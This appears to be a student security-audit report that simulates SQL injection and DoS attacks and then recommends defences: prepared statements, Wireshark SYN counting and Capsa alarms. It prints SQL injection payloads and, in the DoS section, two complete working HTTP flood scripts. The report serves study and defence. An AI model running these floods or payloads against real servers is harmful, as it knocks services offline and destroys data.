
INFORMATION SECURITY ANALYSIS AND

AUDIT

SIMULATION & PREVENTION OF


DoS ATTACKS AND SQL INJECTION

PROJECT REPORT

Submitted by-

S.No  Name              Registration Number
1.    Khushee Paprunia  18BIT0200
2.    Harsh Agrawal     18BIT0209
3.    Saasha Bansal     18BIT0201
4.    Naman Parmani     18BIT0266
Abstract
DoS and SQL Injection are among the most common forms of cyber-security attack. Many
papers exploring different defence mechanisms against these two attacks have been
published, but a perfect solution still eludes computer scientists. Our project therefore
aims to simulate the two attacks and, from what is observed, arrive at a robust detection
and defence system against DoS and SQL Injection attacks. A secure storage procedure
strategy is adopted to block SQL Injection attacks.

Introduction
DDoS Attack
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the
bandwidth or resources of a targeted system, usually one or more web servers. Such an
attack is often the result of multiple compromised systems (for example, a botnet) flooding
the targeted system with traffic. When a server is overloaded with connections, new
connections can no longer be accepted. The major advantages to an attacker of a
distributed denial-of-service attack are that multiple machines can generate more attack
traffic than one machine, multiple attack machines are harder to shut off than one attack
machine, and the behaviour of each attack machine can be stealthier, making it harder to
track and shut down.

SQL Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which
malicious SQL statements are inserted into an entry field for execution (e.g. to dump the
database contents to the attacker). SQL injection must exploit a security vulnerability in an
application's software, for example when user input is incorrectly filtered for string-literal
escape characters embedded in SQL statements, or when user input is not strongly typed and
is unexpectedly executed. SQL injection attacks allow attackers to spoof identity, tamper with
existing data, cause repudiation issues such as voiding transactions or changing balances,
disclose all data on the system, destroy the data or make it otherwise unavailable, and
become administrators of the database server.
Usually, attackers first use a special character such as a single quote (') to check whether
the system is injectable. For example, suppose the system's internal SQL query is
"SELECT * FROM User WHERE username = '" + username + "';" and the attacker's input is
"evil's". The application then generates the query SELECT * FROM User WHERE username =
'evil's', which causes a syntax error when it is executed on the database. Once the attacker
has confirmed this security bug in the system, he can use it for further SQL injections that
modify the system maliciously.
Problem Statement
1. The Open Web Application Security Project (OWASP), the globally recognised
standard awareness document for developers and web application security,
consistently points out that database injection and Denial of Service (DoS) attacks
are the greatest security risks to modern web applications.
2. Acknowledging these growing web security risks, we aim to suggest security
patches that can help safeguard organisations and critical information.

Literature Review:

1. Title: SQL injection prevention system
   Authors: Voitovych, Olesya; Yuvkovetskyi, O.; Kupershtein, Leonid et al.
   Journal: not stated
   Year: 2016
   Abstract: This paper explores three approaches to prevent SQL Injection Attacks. The
   first method is converting special characters to HTML entities. The other two methods
   use regular expressions and exceptions. The proposed protection system is designed as
   a set of scripts built into the webpage resources.

2. Title: Review of SQL Injection: Problems and Prevention
   Authors: Mohd Yunus, Mohd Amin; Brohan, Muhammad; Mohd Nawi et al.
   Journal: International Journal on Informatics Visualization
   Year: 2018
   Abstract: This paper demonstrates the adaptation of the Blockchain concept to avoid
   an SQL injection attack. Here each node is requested to access another node's
   database, and the requesting node is verified by the node that accepted the request.
   If not accepted, the request is rejected for security purposes. The concept is applied
   to all nodes. A node could be a server, computer etc. on a computer network.

3. Title: Study on SQL Injection Attacks: Mode, Detection and Prevention
   Authors: S. Som, S. Sinha, R. Kataria et al.
   Journal: International Journal of Engineering Applied Sciences and Technology, 2016,
   Vol. 1, Issue 8, ISSN No. 2455-2143, Pages 23-29
   Year: 2016
   Abstract: This paper has demonstrated a strategy to convert an SQL query into a
   number of helpful tokens by applying tokenization and then encoding all literals,
   fields, tables and information in the query with the AES algorithm to avoid SQLIA.

4. Title: A Study on Recent Approaches in Handling DDoS Attacks
   Authors: Mukhopadhyay, Debajyoti; Oh, Byung-Jun; Shim et al.
   Journal: not stated
   Year: 2010
   Abstract: This paper presents four major approaches that are considered by experts
   to tackle DDoS attacks: the rate limit solution, defense by offense, the active
   filtering solution and the IP traceback approach.

5. Title: Protection from Distributed Denial of Service Attack Using History-based IP
   Filtering
   Authors: Tao Peng, Christopher Leckie, Kotagiri Ramamohanarao et al.
   Journal: not stated
   Year: 2003
   Abstract: This paper introduces a practical scheme to defend against DDoS attacks
   based on IP source address filtering. The edge router keeps a history of all the
   legitimate IP addresses which have previously appeared in the network. When the edge
   router is overloaded, this history is used to decide whether to admit an incoming IP
   packet.

6. Title: A Distributed-Log-based IP Traceback Scheme to Defeat DDoS Attacks
   Authors: Yinan Jing, Jingtao Li, Xueping Wang, Xiaochun et al.
   Journal: 20th International Conference on Advanced Information Networking and
   Applications - Volume 1 (AINA'06)
   Year: 2006
   Abstract: IP traceback is one of the most effective techniques to defeat these
   attacks by identifying attack sources even in the presence of IP spoofing. Because of
   low marking packet utilization, the convergence time of traditional probabilistic
   packet marking (PPM) schemes is still too long. In order to shorten the convergence
   time, a distributed-log-based IP traceback scheme is proposed.

7. Title: A study on SQL injection techniques
   Authors: Ruby Devi, R. Venkatesan, Raghuraman Koteeswaran
   Journal: International Journal of Pharmacy and Technology
   Year: 2016
   Abstract: This study paper is prepared to give comprehensive coverage of topics such
   as the basics of SQL Injection, its types, and recent attacks as a case study.

8. Title: A Study on DDoS Attacks, Danger and its Prevention
   Authors: Bhawna Sinha, Sushmita Chakraborty, Praveen Kumar
   Journal: -
   Year: 2019
   Abstract: This paper mainly focuses on the DDoS attack, which obstructs network
   availability by overflowing the victim with a high volume of illegal traffic,
   usurping its bandwidth and overburdening it to prevent valid traffic from getting
   through. We have also described the various types of DoS attack techniques that are
   inflicted upon ISPs. The aim of this research is to find the various techniques to
   prevent these attacks, along with their mitigation techniques, and to find any
   possible solution.

Aim
Simulate DoS and SQL Injection attacks, observe system/application behaviour during the
attack period, and then suggest and recommend robust defence and detection mechanisms
against DDoS attacks and SQL Injection.

Software Used
• Colasoft Capsa
• phpMyAdmin
• XAMPP
• Wireshark

Proposed Methodology
● DoS Attack Prevention: The project shall demonstrate the functionality of software tools
such as Colasoft Capsa, Capsa's Enterprise Edition and Capsa's Alarm Explorer to detect
and mitigate DoS attacks.
● SQL Injection Attack Simulation: To simulate an SQL Injection, we plan on creating a
vulnerable webpage, specifically one that accesses its database through phpMyAdmin and
XAMPP.
● SQL Injection Attack Prevention: We plan on using prepared statements with variable
binding (also known as parameterized queries), which first define all the SQL code and
then pass each parameter to the query later. This coding style allows the database to
distinguish between code and data, regardless of what user input is supplied. Prepared
statements ensure that an attacker is not able to manipulate the intent of a query and gain
access.
● DoS Attack Simulation: To simulate a DoS attack on a system in a given WiFi network, we
plan on using Wireshark to analyse the incoming packets on the target's device.

Implementation:
Prevention of SQLi:
We created a website of our own to show how attackers use vulnerable user inputs to
make an SQL injection attack succeed. After that, we used parameterized queries in our
SQL statements to prevent attackers from taking down our website.

Fig 1- Tables stored in the database

Fig 2- Contents stored in the table called 'users'

Fig 3 & 4- Output on logging in normally

Fig 5 & 6- The attacker tries to manipulate the SQL commands to access the database by
entering ' or '1'='1, which turns the query into one containing an OR condition that is
always true, so the database returns all the records.
Another example of what SQL injection can do:

Fig 7 & 8- Suppose that instead of the mysqli_query function we use the mysqli_multi_query
function. Clearly, the statement ; DROP TABLE important; SELECT * FROM 'users' where '1' = '1
contains more than one query. One of these queries makes the database drop the table called
"important".

Security Patch Recommendations:

A security patch is a change applied to an asset to correct the weakness described by a
vulnerability. This corrective action prevents successful exploitation and removes or
mitigates a threat's capability to exploit a specific vulnerability in an asset. Simulating both
SQL injection and DoS on vulnerable webpages and devices has given us valuable insight into
how to protect our devices against the same.
Code snippet that prevents SQL Injection:

Fig 9- Prepared statements ensure that an attacker is not able to manipulate the intent of a query
and gain access.
Fig 10 & 11- The following screenshots demonstrate the capability of such prepared code fragments
to limit access to the database.
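The two injections shown above (the always-true ' or '1'='1 condition of Fig 5 & 6 and the stacked DROP TABLE of Fig 7 & 8) and the prepared-statement fix of Fig 9, reproduced as an added example in Python with an in-memory SQLite database. This is not the project's own PHP/mysqli page: sqlite3's execute() plays the role of mysqli_query (one statement only) and executescript() the role of mysqli_multi_query; the table names come from the report, the rows and credentials are made up.

```python
import sqlite3

# Constructed in-memory stand-in for the report's 'users' and 'important' tables
# (table names from the report; the rows are made up for this example).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('alice', 'alicepw'), ('bob', 'bobpw');
        CREATE TABLE important (id INTEGER PRIMARY KEY, note TEXT);
        INSERT INTO important (note) VALUES ('keep me');
    """)
    return conn

def build_query(username: str, password: str) -> str:
    # The vulnerable pattern: user input is concatenated straight into the SQL text.
    return ("SELECT * FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")

def login_vulnerable(conn, username, password):
    """Single-statement execution (like mysqli_query): input can still rewrite the
    WHERE clause, but sqlite3.execute() refuses a second ';'-stacked statement."""
    return conn.execute(build_query(username, password)).fetchall()

def login_vulnerable_multi(conn, username, password):
    """Multi-statement execution (like mysqli_multi_query): every ';'-separated
    statement in the concatenated text runs, including an injected DROP TABLE."""
    conn.executescript(build_query(username, password))

def login_prepared(conn, username, password):
    """The fix: the SQL text is fixed up front and the values are bound as parameters,
    so the database never parses user input as code."""
    return conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()

def table_exists(conn, name: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)).fetchone()
    return row is not None

TAUTOLOGY = "' or '1'='1"   # Fig 5 & 6 payload, supplied here in the password field
STACKED = "'; DROP TABLE important; SELECT * FROM users WHERE '1'='1"   # Fig 7 & 8 payload

def demo() -> dict:
    results = {}
    conn = make_db()
    # Password check becomes: ... AND password = '' or '1'='1'  -> the OR matches every row.
    results["vuln_rows"] = len(login_vulnerable(conn, "alice", TAUTOLOGY))
    results["prepared_rows"] = len(login_prepared(conn, "alice", TAUTOLOGY))
    try:
        login_vulnerable(conn, STACKED, "x")
        results["single_stmt_refused"] = False
    except (sqlite3.ProgrammingError, sqlite3.Warning):  # "only one statement at a time"
        results["single_stmt_refused"] = True
    results["table_after_single"] = table_exists(conn, "important")
    login_vulnerable_multi(conn, STACKED, "x")          # stacked statements all run
    results["table_after_multi"] = table_exists(conn, "important")
    conn2 = make_db()
    login_prepared(conn2, STACKED, "x")                 # bound value never becomes SQL code
    results["table_after_prepared"] = table_exists(conn2, "important")
    return results

if __name__ == "__main__":
    print(demo())
```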

Preventing DoS or DDoS Attacks


Before attack:

After attack:

Code 1:

```python
#!/usr/bin/python3
# -*- coding: utf-8 -*-

# python 3.3.2+ Hammer Dos Script v.1

# by Can Yalçın
# only for legal purpose

from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random

def user_agent():
    global uagent
    uagent=[]
    uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
    uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
    uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
    uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
    return(uagent)

def my_bots():
    global bots
    bots=[]
    bots.append("http://validator.w3.org/check?uri=")
    bots.append("http://www.facebook.com/sharer/sharer.php?u=")
    return(bots)

def bot_hammering(url):
    try:
        while True:
            req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
            print("\033[94mbot is hammering...\033[0m")
            time.sleep(.1)
    except:
        time.sleep(.1)

def down_it(item):
    try:
        while True:
            packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host,int(port)))
            if s.sendto( packet, (host, int(port)) ):
                s.shutdown(1)
                print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <-- packet sent! hammering--> \033[0m")
            else:
                s.shutdown(1)
                print("\033[91mshut<->down\033[0m")
            time.sleep(.1)
    except socket.error as e:
        print("\033[91mno connection! server maybe down\033[0m")
        #print("\033[91m",e,"\033[0m")
        time.sleep(.1)

def dos():
    while True:
        item = q.get()
        down_it(item)
        q.task_done()

def dos2():
    while True:
        item=w.get()
        bot_hammering(random.choice(bots)+"http://"+host)
        w.task_done()

def usage():
    print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/
    It is the end user's responsibility to obey all applicable laws.
    It is just for server testing script. Your ip is visible. \n
    usage : python3 hammer.py [-s] [-p] [-t]
    -h : help
    -s : server ip
    -p : port default 80
    -t : turbo default 135 \033[0m''')
    sys.exit()

def get_parameters():
    global host
    global port
    global thr
    global item
    optp = OptionParser(add_help_option=False,epilog="Hammers")
    optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
    optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
    optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
    optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
    optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
    opts, args = optp.parse_args()
    logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
    if opts.help:
        usage()
    if opts.host is not None:
        host = opts.host
    else:
        usage()
    if opts.port is None:
        port = 80
    else:
        port = opts.port
    if opts.turbo is None:
        thr = 135
    else:
        thr = opts.turbo

# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()

if __name__ == '__main__':
    if len(sys.argv) < 2:
        usage()
    get_parameters()
    print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
    print("\033[94mPlease wait...\033[0m")
    user_agent()
    my_bots()
    time.sleep(5)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host,int(port)))
        s.settimeout(1)
    except socket.error as e:
        print("\033[91mcheck server ip and port\033[0m")
        usage()
    while True:
        for i in range(int(thr)):
            t = threading.Thread(target=dos)
            t.daemon = True # if thread is exist, it dies
            t.start()
            t2 = threading.Thread(target=dos2)
            t2.daemon = True # if thread is exist, it dies
            t2.start()
        start = time.time()
        #tasking
        item = 0
        while True:
            if (item>1800): # for no memory crash
                item=0
                time.sleep(.1)
            item = item + 1
            q.put(item)
            w.put(item)
        q.join()
        w.join()
```

Code 2:

```python
import socket
import threading

target = input("Enter The ip: ")

fake_ip = '182.21.20.32'
port = 80

attack_num = 0

def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
        s.close()

        global attack_num
        attack_num += 1
        print(attack_num)

for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()
```

Detection using Wireshark:

Look out for an immense number of TCP connection requests. The proper display filter is
tcp.flags.syn == 1 and tcp.flags.ack == 0
The server under attack will respond with a smaller number of SYN/ACKs. These can be
spotted with the display filter tcp.flags.syn == 1 and tcp.flags.ack == 1. Compare the
number of SYNs with the number of SYN/ACKs: as long as the numbers are identical, your
firewall or server is holding up.
Fig 12 & 13- Since, in the above case, the numbers are identical, the firewall/server is doing a
good job of keeping the system safe.
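The SYN versus SYN/ACK comparison described above, as an added example that is not part of the original report: it mirrors the two Wireshark display filters on constructed packet summaries. The "src -> dst [FLAGS]" line format and all addresses are invented for this example (it is not a real Wireshark export format), and flood_trace() builds a synthetic capture in which the server stops answering once its backlog is exhausted.

```python
import re
from collections import Counter

# Constructed packet summaries in the shape of Wireshark's Info column,
# "<src> -> <dst> [FLAGS]" (an illustrative format, not a real export).
# A healthy trace: every SYN is answered by a SYN/ACK, as in Fig 12 & 13.
NORMAL_TRACE = """\
10.0.0.5 -> 10.0.0.1 [SYN]
10.0.0.1 -> 10.0.0.5 [SYN, ACK]
10.0.0.5 -> 10.0.0.1 [ACK]
10.0.0.7 -> 10.0.0.1 [SYN]
10.0.0.1 -> 10.0.0.7 [SYN, ACK]
10.0.0.7 -> 10.0.0.1 [ACK]
"""

LINE_RE = re.compile(r"^(\S+) -> (\S+) \[([A-Z, ]+)\]$")

def parse_trace(text: str) -> list:
    """Turn summary lines into (src, dst, flag-set) tuples; unparseable lines are skipped."""
    pkts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            pkts.append((m.group(1), m.group(2), {f.strip() for f in m.group(3).split(",")}))
    return pkts

def is_syn(flags: set) -> bool:        # tcp.flags.syn == 1 and tcp.flags.ack == 0
    return "SYN" in flags and "ACK" not in flags

def is_synack(flags: set) -> bool:     # tcp.flags.syn == 1 and tcp.flags.ack == 1
    return "SYN" in flags and "ACK" in flags

def syn_report(pkts: list, server: str) -> dict:
    """Compare SYNs sent to the server with SYN/ACKs it returns, as the report suggests.
    Equal counts mean the server is keeping up; a large surplus of unanswered SYNs is
    the half-open backlog that characterises a SYN flood."""
    syn_sources = Counter(src for src, dst, f in pkts if dst == server and is_syn(f))
    syns = sum(syn_sources.values())
    synacks = sum(1 for src, dst, f in pkts if src == server and is_synack(f))
    return {
        "syn": syns,
        "synack": synacks,
        "unanswered": syns - synacks,
        "holding_up": syns == synacks,
        "top_sources": syn_sources.most_common(3),   # where to look first in the capture
    }

def flood_trace(server: str, n_syn: int, n_synack: int) -> str:
    """Constructed flood trace for testing: n_syn SYNs from a handful of hosts, of which
    only the first n_synack are answered (the server's backlog is exhausted)."""
    lines = []
    for i in range(n_syn):
        client = f"10.0.0.{100 + i % 5}"
        lines.append(f"{client} -> {server} [SYN]")
        if i < n_synack:
            lines.append(f"{server} -> {client} [SYN, ACK]")
    return "\n".join(lines)

if __name__ == "__main__":
    print(syn_report(parse_trace(NORMAL_TRACE), "10.0.0.1"))
    print(syn_report(parse_trace(flood_trace("10.0.0.1", 300, 60)), "10.0.0.1"))
```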

- We can also view Wireshark's graphs for a visual representation of the uptick in
traffic.
- The overview of your network will make spikes in traffic quickly noticeable. You
should be able to notice an uptick in the global utilisation graph, as well as in the total
traffic by bytes.
- During flooding, it shows a massive spike in overall packets, from near 0 to about a
thousand packets a second.
Using Colasoft Capsa:
DoS attacks are easy to recognise but extremely difficult to mitigate on a personal device. It
is possible to use software tools like Colasoft Capsa, which make it easy and quick to detect
and locate network attacks. The first port of call for detecting a DoS attack is the
dashboard. The overview of your network will make spikes in traffic quickly noticeable. You
should be able to notice an uptick in the global utilisation graph, as well as in the total traffic
by bytes:

Fig 7. Representation of a SYN flood attack on a PC

Admins can use Capsa's Alarm Explorer to get an instant notification when unusual traffic
is detected:
Alternatively, Capsa's Enterprise Edition allows system/network administrators to
immediately start a security analysis profile, which has a dedicated DoS attack tab. It also
lets admins look at TCP conversation details to quickly decode and verify
attacks:

Fig 8. Useful statistics for admins to look into TCP conversation

Going further, we would like to remind the reader of the illegal and unpredictable nature of
a DoS/DDoS attack. Some other general security recommendations for networks and
businesses are therefore stated as follows:

1. Planning: While setting up your website/network (internal or external), be sure to
also have a response strategy suited to your network's architecture.
2. Security Response Team: Designate roles to members of the network administration
or IT teams in the event of such an attack.
3. Security Tools: Make sure your networks are well equipped with key tools such as
firewalls, network monitoring software, anti-virus and anti-malware programs, as
well as threat monitoring systems. With these, you can monitor your network's
baseline traffic and set up alerts for behaviour that is out of the ordinary.
4. Updated Software: All deployed systems must be kept updated to their latest
versions at all times. An unresolved bug can prove to be a loophole for an attacker.

Conclusion
SQL Injection and DoS attacks are two vastly different modes of attack that have time and
again jeopardised businesses because of their tendency to be extremely invasive and highly
unpredictable. Through this project, we have attempted to simulate the two dangerous attacks
in well-monitored and legal environments to gather deep insight into their functioning. Our
observations have concluded that conducting such attacks only becomes difficult if the
target's device has proper, well-functioning network security mechanisms in place.
Acknowledging this has led us to make practical security recommendations to help better
safeguard networks and devices.

Future prospects
Cyber attacks like SQL Injection and DoS pose a great threat to all existing websites that
make use of SQL databases. Hence, it is extremely important to research both cases further
to make sure that databases with sensitive information, complex network architectures
and personal devices stay secure.

In the case of SQL Injection, the adopted design can be improved to incorporate features that
prevent attackers from signing up, using the database and accessing content. Various
code injection techniques may be developed over time, and the security mechanisms must
constantly evolve to make sure that each of these fraudulent attempts is prevented. In
addition, different layers of access based on authorisation could be incorporated to
ensure confidentiality at each level. Owing to their highly unpredictable nature, DoS attacks
can take organisations completely by surprise. It is important to support and promote the
evolution of network security tools, to make sure such incidents are treated seriously as
cyber security violations, and to distribute free tools to small businesses and other
networks for additional protection.
References
1. Voitovych, Olesya & Yuvkovetskyi, O. & Kupershtein, Leonid. (2016). SQL injection
prevention system. 1-4. 10.1109/UkrMiCo.2016.7739642.
2. Mohd Yunus, Mohd Amin & Brohan, Muhammad & Mohd Nawi, Nazri & Salwana,
Ely & Najib, Nurhakimah & Liang, Chan. (2018). Review of SQL Injection:
Problems and Prevention. JOIV: International Journal on Informatics Visualization. 2.
215. 10.30630/joiv.2.3-2.144.
3. Mahapatra, Rajendra. (2012). A Survey Of Sql Injection Countermeasures.
International Journal of Computer Science & Engineering Survey. 3. 55-74.
10.5121/ijcses.2012.3305.
4. S. Som, S. Sinha, R. Kataria, "Study On SQL Injection Attacks: Mode, Detection And
Prevention", International Journal of Engineering Applied Sciences and Technology
(IJEAST), Vol. 1, Issue 8, ISSN No. 2455-2143, 2016.
5. Mukhopadhyay, Debajyoti & Oh, Byung-Jun & Shim, Sang-Heon & Kim, Young-Chon.
(2010). A Study on Recent Approaches in Handling DDoS Attacks.
6. Yinan Jing, Jingtao Li, Xueping Wang, Xiaochun Xiao and Gendu Zhang, "A
Distributed-Log-based IP Traceback Scheme to Defeat DDoS Attacks," 20th
International Conference on Advanced Information Networking and Applications -
Volume 1 (AINA'06), Vienna, 2006, pp. 25-32, doi: 10.1109/AINA.2006.22.
7. Tao Peng, Christopher Leckie, Kotagiri Ramamohanarao; Protection from distributed
denial of service attacks using history-based IP filtering; IEEE International
Conference on Communications, 11-15 May 2003; pp. 482-486.
8. Peng, T., Leckie, C., Ramamohanarao, K. Survey of network-based defense
mechanisms countering the DoS and DDoS problems. ACM Comput Surv 2007;
39(1): 3.
9. Zargar, S. T., Joshi, J., Tipper, D. A survey of defense mechanisms against distributed
denial of service (DDoS) flooding attacks. IEEE Commun Surv Tut 2013; 15(4):
2046-2069.
10. Mahjabin, Tasnuva & Xiao, Yang & Sun, Guang & Jiang, Wangdong. (2017). A survey
of distributed denial-of-service attack, prevention, and mitigation techniques.
International Journal of Distributed Sensor Networks. 13. 155014771774146.
10.1177/1550147717741463.
